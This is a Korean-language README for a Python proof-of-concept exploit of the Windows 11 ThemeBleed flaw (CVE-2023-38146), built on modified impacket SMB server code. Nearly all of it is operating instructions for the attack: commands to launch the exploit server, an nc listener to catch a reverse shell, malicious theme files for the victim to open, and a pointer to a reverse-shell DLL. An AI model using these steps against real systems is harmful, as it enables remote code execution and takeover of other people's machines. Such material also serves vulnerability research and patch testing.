
impacket을 사용해 python으로 작성된 Windows 11 ThemeBleed CVE-2023-38146 PoC입니다. https://jnns.de/posts/cve-2023-38146-poc/
https://github.com/gabe-k/themebleed 에서 크게 영감을 받았습니다. 이 도구는 Windows에서만 실행되므로 제가 이 PoC를 작성한 이유입니다.
impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py) 의 수정된 코드를 사용했습니다.
블로그 게시물: https://jnns.de/posts/cve-2023-38146-poc/
의존성 설치 후 애플리케이션 실행:
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# 다른 셸에서 nc 리스너 시작
rlwrap -cAr nc -lvnp 4711
취약한 머신에서 "evil_theme.theme" 또는 "evil_theme.themepack"을 사용하세요.
성공!
"./td/" 폴더에 내보내진 함수 "VerifyThemeVersion"이 있는 DLL을 "Aero.msstyles_vrf_evil.dll" 이름으로 넣으세요. 예제 DLL은 구글링하거나 제 예제 https://github.com/Jnnshschl/ThemeBleedReverseShellDLL 을 사용할 수 있습니다.
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# 다른 셸에서 nc 리스너 시작
rlwrap -cAr nc -lvnp 4711